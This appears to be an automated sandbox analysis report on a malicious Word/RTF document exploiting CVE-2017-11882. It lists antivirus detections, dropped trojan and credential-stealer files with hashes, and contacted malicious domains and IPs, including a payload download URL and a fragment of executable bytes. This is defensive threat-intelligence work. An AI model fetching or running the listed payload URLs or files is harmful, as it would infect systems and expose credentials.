Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Owner/User Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	Remote System Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
New Updated 20210810.doc	39%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882
New Updated 20210810.doc	100%	Avira	HEUR/Rtf.Malformed

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\name.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UPDATED-08102021.PDF[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UPDATED-08102021.PDF[1].exe	36%	ReversingLabs	Win32.Trojan.Sabsik
C:\Users\user\AppData\Local\Temp\InstallUtil.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\InstallUtil.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\name.exe	36%	ReversingLabs	Win32.Trojan.Sabsik

Unpacked PE Files

Source	Detection	Scanner	Label	Download
7.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
5.2.InstallUtil.exe.400000.0.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
5.2.InstallUtil.exe.400000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
4.2.name.exe.3f349d2.16.unpack	100%	Avira	TR/Inject.vcoldi	Download File
4.2.name.exe.3d2bea2.13.unpack	100%	Avira	TR/Inject.vcoldi	Download File

Domains

Source	Detection	Scanner	Label	Link
vecvietnam.com.vn	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://b.scorecardresearch.com/beacon.js	0%	Avira URL Cloud	safe
http://ns.adobe.c/s	0%	Avira URL Cloud	safe
http://crl.microsoft	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://cache.btrll.com/default/Pix-1x1.gif	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://n.f	0%	Avira URL Cloud	safe
http://ns.adobede	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
http://ftp.badonfashoin.com	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://ns.ao	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
vecvietnam.com.vn	103.255.237.180	true	true	10%, Virustotal, Browse	unknown
ftp.badonfashoin.com	45.141.152.18	true	true		unknown
www.google.com	142.250.185.196	true	false		high
64.89.4.0.in-addr.arpa	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://b.scorecardresearch.com/beacon.js	bhvC767.tmp.7.dr	false	Avira URL Cloud: safe	unknown
http://ns.adobe.c/s	name.exe, 00000004.00000002.2154693854.0000000004CE5000.00000004.00000001.sdmp, name.exe, 00000004.00000003.2122142450.0000000004CE4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://acdn.adnxs.com/ast/ast.js	bhvC767.tmp.7.dr	false		high
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_	bhvC767.tmp.7.dr	false		high
http://crl.microsoft	name.exe, 00000004.00000003.2131621368.00000000060F7000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net03	name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	bhvC767.tmp.7.dr	false		high
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png	bhvC767.tmp.7.dr	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9	bhvC767.tmp.7.dr	false		high
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html	bhvC767.tmp.7.dr	false		high
https://deff.nelreports.net/api/report?cat=msn	bhvC767.tmp.7.dr	false	URL Reputation: safe	unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js	bhvC767.tmp.7.dr	false		high
http://cache.btrll.com/default/Pix-1x1.gif	bhvC767.tmp.7.dr	false	Avira URL Cloud: safe	unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683	bhvC767.tmp.7.dr	false		high
https://www.google.com	name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp	false		high
http://o.aolcdn.com/ads/adswrappermsni.js	bhvC767.tmp.7.dr	false		high
http://cdn.taboola.com/libtrc/msn-home-network/loader.js	bhvC767.tmp.7.dr	false		high
http://www.msn.com/?ocid=iehp	vbc.exe, 00000007.00000003.2171067444.0000000000672000.00000004.00000001.sdmp, bhvC767.tmp.7.dr	false		high
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033	bhvC767.tmp.7.dr	false		high
http://static.chartbeat.com/js/chartbeat.js	bhvC767.tmp.7.dr	false		high
http://www.msn.com/de-de/?ocid=iehp	vbc.exe, 00000007.00000003.2171067444.0000000000672000.00000004.00000001.sdmp, bhvC767.tmp.7.dr	false		high
http://whatismyipaddress.com/-	name.exe, 00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp	false		high
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%	bhvC767.tmp.7.dr	false		high
http://www.%s.comPA	name.exe, 00000004.00000002.2156504206.0000000005C50000.00000002.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2387769043.00000000082A0000.00000002.00000001.sdmp, vbc.exe, 00000007.00000002.2175419670.0000000002C00000.00000002.00000001.sdmp	false	URL Reputation: safe	low
https://login.yahoo.com/config/login	vbc.exe	false		high
http://www.site.com/logs.php	InstallUtil.exe, 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp	false		high
http://www.nirsoft.net/	vbc.exe, vbc.exe, 00000007.00000002.2174054080.0000000000400000.00000040.00000001.sdmp	false		high
http://ocsp.entrust.net0D	name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	name.exe, 00000004.00000002.2141929426.0000000002341000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3	bhvC767.tmp.7.dr	false		high
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683	bhvC767.tmp.7.dr	false		high
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(	bhvC767.tmp.7.dr	false		high
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9	bhvC767.tmp.7.dr	false		high
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh	bhvC767.tmp.7.dr	false		high
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js	bhvC767.tmp.7.dr	false		high
http://crl.entrust.net/server1.crl0	name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	false		high
https://contextual.media.net/8/nrrV73987.js	bhvC767.tmp.7.dr	false		high
http://n.f	name.exe, 00000004.00000002.2154693854.0000000004CE5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js	bhvC767.tmp.7.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	bhvC767.tmp.7.dr	false		high
http://ns.adobede	name.exe, 00000004.00000002.2154693854.0000000004CE5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	bhvC767.tmp.7.dr	false	URL Reputation: safe	unknown
http://ftp.badonfashoin.com	InstallUtil.exe, 00000005.00000002.2378587090.0000000002490000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	name.exe, 00000004.00000002.2156504206.0000000005C50000.00000002.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2387769043.00000000082A0000.00000002.00000001.sdmp, vbc.exe, 00000007.00000002.2175419670.0000000002C00000.00000002.00000001.sdmp	false		high
http://ns.ao	name.exe, 00000004.00000002.2154693854.0000000004CE5000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549	bhvC767.tmp.7.dr	false		high
http://cdn.at.atwola.com/_media/uac/msn.html	bhvC767.tmp.7.dr	false		high
https://www.google.com/accounts/servicelogin	vbc.exe	false		high
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset	bhvC767.tmp.7.dr	false		high
https://secure.comodo.com/CPS0	name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	false		high
https://policies.yahoo.com/w3c/p3p.xml	bhvC767.tmp.7.dr	false		high
https://www.google.com/	name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	name.exe, 00000004.00000002.2140582877.0000000000630000.00000004.00000020.sdmp	false		high
http://www.msn.com/advertisement.ad.js	bhvC767.tmp.7.dr	false		high
http://ib.adnxs.com/async_usersync_file	vbc.exe, 00000007.00000003.2171067444.0000000000672000.00000004.00000001.sdmp, bhvC767.tmp.7.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.196	www.google.com	United States	15169	GOOGLEUS	false
103.255.237.180	vecvietnam.com.vn	Viet Nam	45899	VNPT-AS-VNVNPTCorpVN	true
45.141.152.18	ftp.badonfashoin.com	Romania	9009	M247GB	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	462616
Start date:	10.08.2021
Start time:	15:28:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 26s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	New Updated 20210810.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winDOC@10/14@7/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 8.4% (good quality ratio 8.1%) Quality average: 84.8% Quality standard deviation: 24.3%
HCA Information:	Successful, ratio: 95% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200 Excluded domains from analysis (whitelisted): www.bing.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryDirectoryFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:28:37	API Interceptor	246x Sleep call for process: EQNEDT32.EXE modified
15:28:51	API Interceptor	114x Sleep call for process: name.exe modified
15:29:05	API Interceptor	202x Sleep call for process: InstallUtil.exe modified
15:29:19	API Interceptor	17x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.255.237.180	0804210004082021.doc	Get hash	malicious	Browse	vecvietnam.com.vn/New123/0408202100804.exe
	280072109764552.doc	Get hash	malicious	Browse	vecvietnam.com.vn/xpen3/09867654270721.PDF.exe
	G0ESHzsrvg.exe	Get hash	malicious	Browse	www.sukien-freefire12.com/8rg4/?Ktx=VFDTfh06mkJPRzHspKepKHMYsbk6CR7QazJOU8Mb+pCLTj8Wok+dDdp+Lip1alFcm5QC4IbarA==&OtNDOP=wXOLMFD0PT3lc
	6OUYcd3GIs.exe	Get hash	malicious	Browse	www.sukien-freefire12.com/8rg4/?lJBtHN_=VFDTfh06mkJPRzHspKepKHMYsbk6CR7QazJOU8Mb+pCLTj8Wok+dDdp+Lil1J1Jf/pQU&_jrxqz=kzrxU82
45.141.152.18	Confirmarea platii.pdf.exe	Get hash	malicious	Browse	alfawood.us/xsclk/index.php
	Confirmarea platii.pdf.exe	Get hash	malicious	Browse	alfawood.us/mkdgs/index.php
	e-dekont.html.exe	Get hash	malicious	Browse	alfawood.us/mkdgs/index.php
	Credit Advice -TT6635993652908.PDF.exe	Get hash	malicious	Browse	alfawood.us/mkdgs/index.php
	Dekont.pdf.exe	Get hash	malicious	Browse	alfawood.us/xsclk/index.php
	Dekont.pdf.exe	Get hash	malicious	Browse	blkgrupdoom.info/scgn/index.php
	e-dekont.html.exe	Get hash	malicious	Browse	blkgrupdoom.info/scgn/index.php
	Dekont.pdf.exe	Get hash	malicious	Browse	blkgrupdoom.info/scgn/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ftp.badonfashoin.com	82658.exe	Get hash	malicious	Browse	45.141.152.18
ftp.badonfashoin.com	87597.exe	Get hash	malicious	Browse	45.141.152.18
vecvietnam.com.vn	0804210004082021.doc	Get hash	malicious	Browse	103.255.237.180
vecvietnam.com.vn	280072109764552.doc	Get hash	malicious	Browse	103.255.237.180

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VNPT-AS-VNVNPTCorpVN	d5reZjGi2R	Get hash	malicious	Browse	113.169.255.119
	SUsQqSw8ip	Get hash	malicious	Browse	14.233.149.211
	en2hmUmzUR	Get hash	malicious	Browse	14.239.136.32
	L6KDzjtxgc	Get hash	malicious	Browse	113.191.154.25
	kqLcuKbZzg	Get hash	malicious	Browse	113.169.132.29
	kWqxU2Gfq2	Get hash	malicious	Browse	113.178.92.34
	OvnD1AdgkD	Get hash	malicious	Browse	123.21.90.70
	HWixtKQtDD	Get hash	malicious	Browse	113.185.74.208
	UMiTH6VAAm	Get hash	malicious	Browse	14.230.156.215
	tWSTvf0HHo	Get hash	malicious	Browse	14.231.22.129
	KoknEiNL8U	Get hash	malicious	Browse	113.163.225.80
	l6TyyMKLix	Get hash	malicious	Browse	14.161.207.71
	LZiStyX7pB	Get hash	malicious	Browse	113.162.243.195
	j9HWivdwqr	Get hash	malicious	Browse	14.236.231.18
	wQ8GDLO5O8	Get hash	malicious	Browse	14.171.58.190
	WdyAWwF87e	Get hash	malicious	Browse	14.165.161.61
	cNP5CmeioO	Get hash	malicious	Browse	14.180.33.89
	rCr0tVxmK3	Get hash	malicious	Browse	14.179.44.49
	0804210004082021.doc	Get hash	malicious	Browse	103.255.237.180
	OJYNvmFRjr	Get hash	malicious	Browse	113.185.159.85
M247GB	qfgP28anog	Get hash	malicious	Browse	196.19.8.214
	j4nJWqkYkI.dll	Get hash	malicious	Browse	83.97.20.174
	Attachment.exe	Get hash	malicious	Browse	5.181.234.138
	PAYMENT_CHECK.PDF.EXE	Get hash	malicious	Browse	217.138.212.57
	DHL_consignment_number#6225954704.exe	Get hash	malicious	Browse	188.72.124.14
	PAYMENT FOR OVERDUE INVOICE.exe	Get hash	malicious	Browse	37.120.210.211
	Paymentcheck.pdf.exe	Get hash	malicious	Browse	217.138.212.57
	kEtjx4XwPd.exe	Get hash	malicious	Browse	37.221.121.20
	w4DEaimFEt	Get hash	malicious	Browse	194.71.126.19
	4A7rphFZrY	Get hash	malicious	Browse	206.127.221.64
	fJn3N6piJM	Get hash	malicious	Browse	45.11.181.37
	1sHut1OhEU	Get hash	malicious	Browse	45.11.181.37
	dIuTSU7cWx	Get hash	malicious	Browse	45.11.181.37
	WVS6wDRacf	Get hash	malicious	Browse	45.11.181.37
	30Bzshze5J	Get hash	malicious	Browse	45.11.181.37
	7D2r6OGZYr	Get hash	malicious	Browse	45.11.181.37
	K2pnt8OlRe	Get hash	malicious	Browse	38.206.34.72
	clip.exe	Get hash	malicious	Browse	185.189.112.27
	micro.exe	Get hash	malicious	Browse	185.189.112.27
	RBWWhsSr4Y.exe	Get hash	malicious	Browse	37.120.210.211

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	order specification.doc	Get hash	malicious	Browse	142.250.185.196
	RFQ-0810021-061.doc	Get hash	malicious	Browse	142.250.185.196
	BOQ10.08.2021.doc	Get hash	malicious	Browse	142.250.185.196
	14035151501.xlam	Get hash	malicious	Browse	142.250.185.196
	doc_main_8.docx	Get hash	malicious	Browse	142.250.185.196
	INVOICE REGARDING PAYMENT-BY CUSTOMER.doc	Get hash	malicious	Browse	142.250.185.196
	0028739485553.xlsx	Get hash	malicious	Browse	142.250.185.196
	fileattached.xlsm	Get hash	malicious	Browse	142.250.185.196
	Order 3000070469.doc	Get hash	malicious	Browse	142.250.185.196
	PBG-8457-00 04.08.2021 IEC CSA.doc	Get hash	malicious	Browse	142.250.185.196
	items.doc	Get hash	malicious	Browse	142.250.185.196
	Document_0927.doc	Get hash	malicious	Browse	142.250.185.196
	0804210004082021.doc	Get hash	malicious	Browse	142.250.185.196
	items.doc	Get hash	malicious	Browse	142.250.185.196
	RFQ_20210518_131536.doc	Get hash	malicious	Browse	142.250.185.196
	Our Company Account Details-08-2021.xlsx	Get hash	malicious	Browse	142.250.185.196
	Original Shipping .doc	Get hash	malicious	Browse	142.250.185.196
	product picture.doc	Get hash	malicious	Browse	142.250.185.196
	ORDER -RFQ#-TEOS1909061 40HC 21T05 DALIAN.doc	Get hash	malicious	Browse	142.250.185.196
	Request For Quotation.xlsx	Get hash	malicious	Browse	142.250.185.196

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\InstallUtil.exe	0804210004082021.doc	Get hash	malicious	Browse
	280072109764552.doc	Get hash	malicious	Browse
	Paiement de facture.doc	Get hash	malicious	Browse
	ORDER SPECIFICATION.doc	Get hash	malicious	Browse
	UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864888.doc	Get hash	malicious	Browse
	UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864.doc	Get hash	malicious	Browse
	Quotations73280126721_Oriental_Fastech_Manufacturing.doc	Get hash	malicious	Browse
	PurchaseOrder78902AprilOrderNewRoundBars.doc	Get hash	malicious	Browse
	PO_701_36_01_27.doc	Get hash	malicious	Browse
	IMG_51067.doc__.rtf	Get hash	malicious	Browse
	New Order 09022021.doc	Get hash	malicious	Browse
	deliverysorders.doc	Get hash	malicious	Browse
	IMG_Scanned_67022.doc	Get hash	malicious	Browse
	ORD005271444_0.doc	Get hash	malicious	Browse
	INV00004423.doc	Get hash	malicious	Browse
	DTBT760087673.doc	Get hash	malicious	Browse
	IMG_33687.doc	Get hash	malicious	Browse
	IMG_1660392.doc	Get hash	malicious	Browse
	Purchase Order No. 3109 Dated 28.01.2021.doc	Get hash	malicious	Browse
	Order_130577.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UPDATED-08102021.PDF[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	1245696
Entropy (8bit):	6.577327226998129
Encrypted:	false
SSDEEP:	24576:yVwq/EUmGq/wKgDyT/vcKcPw+U6kulaoS18PNMnDbMZ:yVw8lq/wK4wcKcPrXIIN6P
MD5:	83F58ECF0778E3B0ACCA8497DF23EF23
SHA1:	A2123E816FCD387873272E022220FBC05B96D392
SHA-256:	437FAE5AA2CAD8DDB1FE3E316AFDC6A1FDD2676084131FDC082FFDC8A53F066D
SHA-512:	AA80D30C7F4234DFD26170B7817788DBDDA9C02897D0AC788C253D815A14F444DF8DCE47C59B05875821F196CB3571DE4EC584689059C1A86B7F64F504BF4A63
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 36%
Reputation:	low
IE Cache URL:	http://vecvietnam.com.vn/xpen5/UPDATED-08102021.PDF.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......6................................. ... ....@.. .......................`............`.................................L...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........-..........#...@...h............................................K.K.K.E.f.YyD.N.`.s.].E.f.YnD.N.`.s&].E.f.YfD.N.`.s.].E.f.YHD)N.`QAR@PA.ScN]D.jNy\W.O.l.S7NED.jJy.W.O.l.SkNCD.jGyFW.O.l.SpN[D.j]y.W.O.l.S8NyD.jJyAW.O.l.SdN]D.jCyEW.O.l.S"NGD.jVy]W.O.l.S-N.D.jVyQW.O.l.S7NBD.jSy.W.O.l.SxNBD.jGy.W.O.l.S2NVD.jVyXW.O.l.S NTD.jUy.W.O.l.S7NED.jCy.W.O.l.SxNUD.jIyAW.O.l.S9NUD.jRyKW.O.l.S$NVD.jRy.W.O.l.SfN]D^.[.\...).]...A..R.*...<.$...8z%./.....<.$...8g%./.....<.$...8f%./.....<

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{23BF6A28-299E-4B99-A605-44EE5B79BCDD}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E2185495-5638-43A1-A616-4B202C23444A}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	46970
Entropy (8bit):	3.7119407939327025
Encrypted:	false
SSDEEP:	768:7BTkD9awTIdgeMRQAkkTEXQNA0XPgeV5zS2:7BUaRB+QuEX0ZN
MD5:	DFC4EEF2C75137EE683C0A0BC9B953F0
SHA1:	652A5D6FBE99DBA066F9059515061C26A01228BC
SHA-256:	E62B60E5D4261CDBE6F611A6D0F7BC42F62C5A7C07234BA0F0F72077780004F8
SHA-512:	4BAF66E4A049116D3C3218F8D19BA9AD114F9A2C0280AAFF2BEC95C22B05B86A198FB93BA1C3A5D707FC188E8C11C1CDF5FC325A17C73FF2E266C566654FBE80
Malicious:	false
Reputation:	low
Preview:	. . . . . . . . . . . . . . . . . . . . . . . . .7.9.7.2.1.9.7.8. . . . . . ._. . . . . . . . . ... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .Q.a.g.t.C.6.o.f.c.q.p.3.H.Y.q.q.h.I.w.o.F.S.K.P.V.r.k.S.j.L.5.K.c.L.J.F.L.v.X._.h.d.T.8.z.a.H.x.4.y.U.V.B.b.y.D.s.O.F.Y.U.s.9.A.x.m.f.9.o.9.4.d.P.O.P.e.W.q.2.A.1.N.X.S.w.T.v.d.k.........................................................................................................................................\|.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....U

C:\Users\user\AppData\Local\Temp\InstallUtil.exe Download File
Process:	C:\Users\user\AppData\Roaming\name.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41136
Entropy (8bit):	6.155874259465173
Encrypted:	false
SSDEEP:	384:C/xHdGK81tLhBLVKS7xdgoPKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+aPZCM:+Hj81t/0qdrY6Iq8KDLJqisEBuot
MD5:	BB85AA6D90A4157ED799257072B265FF
SHA1:	F97DA28D82E9D81672C78FFBE03123E985E7F6D4
SHA-256:	815FD29D891CB94418BB0CDC44D5095230989FE9DA58421319FCD57E458E39A9
SHA-512:	17EBB032F3663D7971DBE13EE89C82D2D4CF3375C0DA44021D35178DE046FCB2BFB5F89E7CFC68CF4E8570D21FDD9876759443BFDE6CFF5A2A354D2361E64F1E
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 0804210004082021.doc, Detection: malicious, Browse Filename: 280072109764552.doc, Detection: malicious, Browse Filename: Paiement de facture.doc, Detection: malicious, Browse Filename: ORDER SPECIFICATION.doc, Detection: malicious, Browse Filename: UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864888.doc, Detection: malicious, Browse Filename: UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864.doc, Detection: malicious, Browse Filename: Quotations73280126721_Oriental_Fastech_Manufacturing.doc, Detection: malicious, Browse Filename: PurchaseOrder78902AprilOrderNewRoundBars.doc, Detection: malicious, Browse Filename: PO_701_36_01_27.doc, Detection: malicious, Browse Filename: IMG_51067.doc__.rtf, Detection: malicious, Browse Filename: New Order 09022021.doc, Detection: malicious, Browse Filename: deliverysorders.doc, Detection: malicious, Browse Filename: IMG_Scanned_67022.doc, Detection: malicious, Browse Filename: ORD005271444_0.doc, Detection: malicious, Browse Filename: INV00004423.doc, Detection: malicious, Browse Filename: DTBT760087673.doc, Detection: malicious, Browse Filename: IMG_33687.doc, Detection: malicious, Browse Filename: IMG_1660392.doc, Detection: malicious, Browse Filename: Purchase Order No. 3109 Dated 28.01.2021.doc, Detection: malicious, Browse Filename: Order_130577.doc, Detection: malicious, Browse
